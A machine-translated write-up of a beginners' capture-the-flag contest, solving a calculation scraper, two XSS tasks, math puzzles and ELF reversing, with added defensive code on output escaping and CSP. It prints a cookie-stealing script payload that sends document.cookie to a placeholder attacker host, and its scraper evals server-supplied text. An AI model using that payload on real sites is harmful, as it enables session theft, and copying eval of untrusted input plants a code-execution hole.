This article was machine-translated from the Japanese version.


7th place out of 60+N people. The problems have not been made public.

Calc

An HTML version of “Te-Keisan Extremes” from SECCON Beginners CTF 2018. However, there is no time limit for the answers.

Get the mathematical expression and POST the result. Don’t forget to set the cookie for user identification.

import urllib.request
import urllib.parse
from bs4 import BeautifulSoup
from http.cookiejar import CookieJar

url = "http://10.2.6.1:8080/index.php"

# The cookie jar keeps the session cookie that identifies the user across requests.
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(CookieJar()))
res = opener.open(url)
html = res.read().decode("utf-8")
soup = BeautifulSoup(html, "html.parser")
exp = soup.find("div").text  # the expression to solve is the text of the first <div>

for _ in range(100):
    # Evaluate the server-supplied expression and POST it as the "answer" field
    data = urllib.parse.urlencode({'answer': eval(exp)}).encode('utf-8')
    res = opener.open(url, data)
    html = res.read().decode("utf-8")
    print(html)
    # The response carries the next expression in the same place
    soup = BeautifulSoup(html, "html.parser")
    exp = soup.find("div").text

do alert

Inject <script>alert(0)</script> into the provided form and reload.

AS Company

There is a page where you can post an arbitrary title and text via a form, and a crawler visits the posted results. The FLAG is written in the crawler’s UA.

Since you can inject scripts into the form, inject <script>document.location="http://<attacker>?"+encodeURIComponent(document.cookie)</script> into either the title or text, then check the crawler’s access logs.
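From the defender's side, the bug behind both "do alert" and "AS Company" is the same: user-supplied title and text are inserted into the page unescaped, so a crawler that loads the post runs whatever was submitted. As an added example (not the challenge's code), render_post() escapes both fields for HTML element content, contains_raw_script_tag() checks the result, and hardened_headers() shows the response headers that limit what an injected script could do even if escaping is missed. The sample payload's host, the cookie name and the CSP are assumptions.

```python
import html
import re

# Constructed inputs: an ordinary title and a body carrying the kind of payload
# the write-up describes. The host is a placeholder, not a real endpoint.
SAMPLE_TITLE = "hello"
SAMPLE_BODY = ('<script>document.location="http://attacker.invalid/?"'
               '+encodeURIComponent(document.cookie)</script>')

_RAW_SCRIPT_TAG = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE)


def render_post(title: str, body: str) -> str:
    """Render a stored post with both fields escaped for HTML element content.

    html.escape turns < > & " ' into entities, so whatever the poster typed is
    displayed as text instead of being parsed as markup when the crawler (or
    any other user) loads the page.
    """
    return "<article><h2>{}</h2><p>{}</p></article>".format(
        html.escape(title, quote=True), html.escape(body, quote=True)
    )


def contains_raw_script_tag(fragment: str) -> bool:
    """True if an unescaped <script> or </script> tag survives in the fragment."""
    return _RAW_SCRIPT_TAG.search(fragment) is not None


def hardened_headers(session_id: str) -> dict:
    """Response headers that limit the blast radius if escaping is ever missed.

    The CSP forbids inline script, so an injected <script> block does not run;
    HttpOnly keeps the session cookie out of document.cookie. Cookie name and
    policy are assumptions for the example.
    """
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
        "Set-Cookie": "session=%s; HttpOnly; Secure; SameSite=Lax" % session_id,
    }


if __name__ == "__main__":
    fragment = render_post(SAMPLE_TITLE, SAMPLE_BODY)
    print(fragment)
    print("raw script tag present:", contains_raw_script_tag(fragment))
```

Escaping is context-specific: html.escape is right for element content and quoted attribute values, but a value placed inside a script block, a URL or a CSS rule needs that context's own encoding, which is why the CSP is worth having as a second layer.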

Go Fast

Just do the calculations.

print(pow(2, 4085, 97))  # three-argument pow is modular exponentiation; same result as 2**4085 % 97

Factoring

Just factorise into primes.

$ factor 2240118421
2240118421: 43223 51827
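Both "Go Fast" and "Factoring" are one-liners with built-ins, but the algorithms behind them are worth seeing once. As an added example (not part of the original write-up), mod_pow() is square-and-multiply, which is why 2**4085 % 97 is cheap even though 2**4085 is a 4086-bit number, and factorize() is trial division, which is enough for a 32-bit input like 2240118421. Both are checked against the page's own results.

```python
def mod_pow(base: int, exponent: int, modulus: int) -> int:
    """Square-and-multiply modular exponentiation.

    Reduces after every step, so intermediate values never exceed modulus**2
    and the cost is O(log exponent) multiplications. Equivalent to
    pow(base, exponent, modulus).
    """
    if modulus <= 0:
        raise ValueError("modulus must be positive")
    if exponent < 0:
        raise ValueError("negative exponents are not handled here")
    result = 1 % modulus
    base %= modulus
    while exponent:
        if exponent & 1:          # low bit set: multiply this power of base in
            result = (result * base) % modulus
        base = (base * base) % modulus
        exponent >>= 1
    return result


def factorize(n: int) -> list:
    """Prime factorisation by trial division, smallest factor first.

    Fast enough for a 32-bit input like the one here; for large balanced
    semiprimes use Pollard's rho or a real tool such as factor(1).
    """
    if n < 2:
        raise ValueError("n must be >= 2")
    factors = []
    while n % 2 == 0:
        factors.append(2)
        n //= 2
    d = 3
    while d * d <= n:
        while n % d == 0:
            factors.append(d)
            n //= d
        d += 2
    if n > 1:                      # whatever is left has no divisor <= sqrt, so it is prime
        factors.append(n)
    return factors


if __name__ == "__main__":
    print(mod_pow(2, 4085, 97))      # the "Go Fast" value
    print(factorize(2240118421))     # the "Factoring" value
```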

Find it.

You’re given an ELF file bin1. Use xxd to get the flag.

xxd bin1 | grep -A1 ctf
0001060: 6374 6634 627b 666c 3467 5f6e 3037 5f31  ctf4b{dummy____
0001070: 6e5f 6330 6433 5f35 3367 6d33 6e37 7d00  _________flag}.
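Grepping xxd output works but can split a match across two dump lines, which is what the -A1 above is working around. As an added example (not from the original post), here is the same search done on the raw bytes: printable_strings() is the idea behind strings(1), and find_flags() looks for the page's ctf4b{...} format directly and reports the file offset. The sample "binary" is constructed inline and is not the real bin1.

```python
import re

# Constructed sample "binary": an ELF-looking header, some non-printable
# padding, a flag in the page's format, and a compiler note after it.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01" + bytes(9)
    + b"\x48\x89\xe5\x90\x90"
    + b"ctf4b{sample_flag}\x00"
    + b"\x00\x01\x02"
    + b"GCC: (example) 9.3.0\x00"
)

# Flag format used by the challenge; NUL excluded so a match cannot run past
# the end of a C string.
FLAG = re.compile(rb"ctf4b\{[^}\x00]{1,100}\}")


def printable_strings(blob: bytes, min_len: int = 4) -> list:
    """Return every run of at least min_len printable ASCII bytes, like strings(1)."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group(0).decode("ascii") for m in pattern.finditer(blob)]


def find_flags(blob: bytes) -> list:
    """Return (offset, flag) for each substring in the ctf4b{...} format."""
    return [(m.start(), m.group(0).decode("ascii")) for m in FLAG.finditer(blob)]


if __name__ == "__main__":
    # Read a real file with open(path, "rb").read(); the constructed sample is used here.
    for s in printable_strings(SAMPLE_BINARY):
        print(s)
    print(find_flags(SAMPLE_BINARY))
```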

Read it.

The FLAG is hard-coded in the genflag function, written to the stack one byte per mov.

00000000004005eb <genflag>:
  4005eb:       55                      push   rbp
  4005ec:       48 89 e5                mov    rbp,rsp
  4005ef:       48 83 ec 50             sub    rsp,0x50
  4005f3:       64 48 8b 04 25 28 00    mov    rax,QWORD PTR fs:0x28
  4005fa:       00 00
  4005fc:       48 89 45 f8             mov    QWORD PTR [rbp-0x8],rax
  400600:       31 c0                   xor    eax,eax
  400602:       c6 45 c0 63             mov    BYTE PTR [rbp-0x40],0x63
  400606:       c6 45 c1 74             mov    BYTE PTR [rbp-0x3f],0x74
  40060a:       c6 45 c2 66             mov    BYTE PTR [rbp-0x3e],0x66
  40060e:       c6 45 c3 34             mov    BYTE PTR [rbp-0x3d],0x34
  400612:       c6 45 c4 62             mov    BYTE PTR [rbp-0x3c],0x62
  400616:       c6 45 c5 7b             mov    BYTE PTR [rbp-0x3b],0x7b
  40061a:       c6 45 c6 63             mov    BYTE PTR [rbp-0x3a],0x63
  40061e:       c6 45 c7 34             mov    BYTE PTR [rbp-0x39],0x34
----- snip -----
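Reading the flag off a listing like this by hand is error-prone once it runs to dozens of stores, and compilers often merge neighbouring characters into WORD or DWORD immediates that land little-endian. As an added example (not code from the original post), the parser below collects every mov of an immediate to [rbp+off] from an Intel-syntax objdump listing, orders the stores by frame offset and rebuilds the string; it goes beyond the page's listing by handling multi-byte immediates too. The sample listing is the page's own lines; the extra DWORD line is constructed for the example.

```python
import re

# Sample input: the first lines of the objdump listing shown above (addresses
# and encodings as on the page), truncated where the page says "snip".
SAMPLE_LISTING = """\
00000000004005eb <genflag>:
  4005eb:       55                      push   rbp
  4005ec:       48 89 e5                mov    rbp,rsp
  4005ef:       48 83 ec 50             sub    rsp,0x50
  400602:       c6 45 c0 63             mov    BYTE PTR [rbp-0x40],0x63
  400606:       c6 45 c1 74             mov    BYTE PTR [rbp-0x3f],0x74
  40060a:       c6 45 c2 66             mov    BYTE PTR [rbp-0x3e],0x66
  40060e:       c6 45 c3 34             mov    BYTE PTR [rbp-0x3d],0x34
  400612:       c6 45 c4 62             mov    BYTE PTR [rbp-0x3c],0x62
  400616:       c6 45 c5 7b             mov    BYTE PTR [rbp-0x3b],0x7b
  40061a:       c6 45 c6 63             mov    BYTE PTR [rbp-0x3a],0x63
  40061e:       c6 45 c7 34             mov    BYTE PTR [rbp-0x39],0x34
"""

# Constructed extra line (not on the page): a compiler storing four characters
# at once with a DWORD immediate, which lands little-endian in memory.
EXTRA_DWORD_STORE = (
    "  400622:       c7 45 c8 63 34 64 33    mov    DWORD PTR [rbp-0x38],0x33643463\n"
)

_SIZES = {"BYTE": 1, "WORD": 2, "DWORD": 4, "QWORD": 8}
_STORE = re.compile(
    r"mov\s+(BYTE|WORD|DWORD|QWORD) PTR \[rbp([+-]0x[0-9a-f]+)\],0x([0-9a-f]+)",
    re.IGNORECASE,
)


def stack_bytes_from_listing(listing: str) -> bytes:
    """Rebuild a string that code writes to the stack one immediate at a time.

    Every `mov <size> PTR [rbp+off],imm` in an Intel-syntax objdump listing is
    recorded at its frame offset (little-endian for multi-byte immediates) and
    the stores are read back in address order. Offsets never written are
    filled with NUL so a gap stays visible rather than being closed silently.
    """
    frame = {}
    for line in listing.splitlines():
        m = _STORE.search(line)
        if not m:
            continue
        size = _SIZES[m.group(1).upper()]
        base = int(m.group(2), 16)                 # e.g. "-0x40" -> -64
        value = int(m.group(3), 16)
        for i, b in enumerate(value.to_bytes(size, "little")):
            frame[base + i] = b
    if not frame:
        return b""
    lo, hi = min(frame), max(frame)
    return bytes(frame.get(off, 0) for off in range(lo, hi + 1))


def stack_string_from_listing(listing: str) -> str:
    """Decode the rebuilt bytes up to the first NUL (the end of the C string)."""
    raw = stack_bytes_from_listing(listing)
    return raw.split(b"\x00", 1)[0].decode("latin-1")


if __name__ == "__main__":
    print(stack_string_from_listing(SAMPLE_LISTING))
    print(stack_string_from_listing(SAMPLE_LISTING + EXTRA_DWORD_STORE))
```

On a full listing (objdump -M intel -d bin2, piped into this script) the result is the complete flag without running the binary, which matters when the sample is something you would rather not execute.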

Disassemble It.

You’re given an ELF file that asks for a password. Run it in gdb-peda.

$ ./bin3
Password : invalid password
Wrong..
[----------------------------------registers-----------------------------------]
RAX: 0x7fffffffe3e0 --> 0x64696c61766e69 ('invalid')
RBX: 0x0
RCX: 0x0
RDX: 0x1
RSI: 0x555555556016 --> 0x57004e4f43434553 ('SECCON')
RDI: 0x7fffffffe3e0 --> 0x64696c61766e69 ('invalid')
RBP: 0x7fffffffe4b0 --> 0x0
RSP: 0x7fffffffe3d0 --> 0xffffe400
RIP: 0x555555555211 (<main+136>:        call   0x555555555060 <strcmp@plt>)
R8 : 0x7ffff7dd5060 --> 0x7ffff7dd29e0 --> 0x7ffff7b96712 --> 0x2e2e00544d470043 ('C')
R9 : 0x7ffff7b81200 --> 0x2000200020002
R10: 0x0
R11: 0x246
R12: 0x555555555090 (<_start>:  repz nop edx)
R13: 0x7fffffffe590 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x555555555200 <main+119>:   lea    rax,[rbp-0xd0]
   0x555555555207 <main+126>:   lea    rsi,[rip+0xe08]        # 0x555555556016
   0x55555555520e <main+133>:   mov    rdi,rax
=> 0x555555555211 <main+136>:   call   0x555555555060 <strcmp@plt>
   0x555555555216 <main+141>:   test   eax,eax
   0x555555555218 <main+143>:   je     0x555555555235 <main+172>
   0x55555555521a <main+145>:   lea    rdi,[rip+0xdfc]        # 0x55555555601d
   0x555555555221 <main+152>:   mov    eax,0x0
Guessed arguments:
arg[0]: 0x7fffffffe3e0 --> 0x64696c61766e69 ('invalid')
arg[1]: 0x555555556016 --> 0x57004e4f43434553 ('SECCON')
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe3d0 --> 0xffffe400
0008| 0x7fffffffe3d8 --> 0x2
0016| 0x7fffffffe3e0 --> 0x64696c61766e69 ('invalid')
0024| 0x7fffffffe3e8 --> 0x0
0032| 0x7fffffffe3f0 --> 0x0
0040| 0x7fffffffe3f8 --> 0x0
0048| 0x7fffffffe400 --> 0x0
0056| 0x7fffffffe408 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0000555555555211 in main ()
gdb-peda$

Since it’s comparing the input string with ‘SECCON’, I’d guess that this is the password.

./bin3
Password : SECCON
Okay, Process a one byte..
Password : SECCON
Okay, Process a one byte..
Password : SECCON
Okay, Process a one byte..
----- snip -----

Since it kept asking for the same password, I piped in ‘SECCON’ and got the flag.

echo 'SECCON' | ./bin3
Password : Okay, Process a one byte..
Password : Okay, Process a one byte..
Password : Okay, Process a one byte..
Password : Okay, Process a one byte..
----- snip -----
Password : Okay, Process a one byte..
DONE -> FLAG : ctf4b{DUMMY}